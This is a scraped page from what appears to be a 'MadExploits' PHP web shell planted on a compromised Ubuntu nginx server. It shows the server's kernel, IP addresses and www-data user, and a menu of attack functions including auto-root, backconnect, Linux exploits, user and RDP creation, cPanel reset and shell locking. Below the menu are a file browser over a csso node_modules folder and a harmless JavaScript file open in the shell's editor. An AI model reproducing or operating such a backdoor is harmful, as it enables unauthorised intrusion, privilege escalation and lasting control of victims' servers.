Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
csso /
lib /
replace /
[ HOME SHELL ]
Name
Size
Permission
Action
atrule
[ DIR ]
dr-xr-xr-x
property
[ DIR ]
dr-xr-xr-x
Atrule.js
280
B
-rw-rw-rw-
AttributeSelector.js
981
B
-rw-rw-rw-
Dimension.js
1.46
KB
-rw-rw-rw-
Number.js
1.06
KB
-rw-rw-rw-
Percentage.js
1.12
KB
-rw-rw-rw-
String.js
263
B
-rw-rw-rw-
Url.js
1.04
KB
-rw-rw-rw-
Value.js
569
B
-rw-rw-rw-
color.js
12.72
KB
-rw-rw-rw-
index.js
740
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AttributeSelector.js
// Can unquote attribute detection // Adopted implementation of Mathias Bynens // https://github.com/mathiasbynens/mothereff.in/blob/master/unquoted-attributes/eff.js var escapesRx = /\\([0-9A-Fa-f]{1,6})(\r\n|[ \t\n\f\r])?|\\./g; var blockUnquoteRx = /^(-?\d|--)|[\u0000-\u002c\u002e\u002f\u003A-\u0040\u005B-\u005E\u0060\u007B-\u009f]/; function canUnquote(value) { if (value === '' || value === '-') { return; } // Escapes are valid, so replace them with a valid non-empty string value = value.replace(escapesRx, 'a'); return !blockUnquoteRx.test(value); } module.exports = function(node) { var attrValue = node.value; if (!attrValue || attrValue.type !== 'String') { return; } var unquotedValue = attrValue.value.replace(/^(.)(.*)\1$/, '$2'); if (canUnquote(unquotedValue)) { node.value = { type: 'Identifier', loc: attrValue.loc, name: unquotedValue }; } };
Close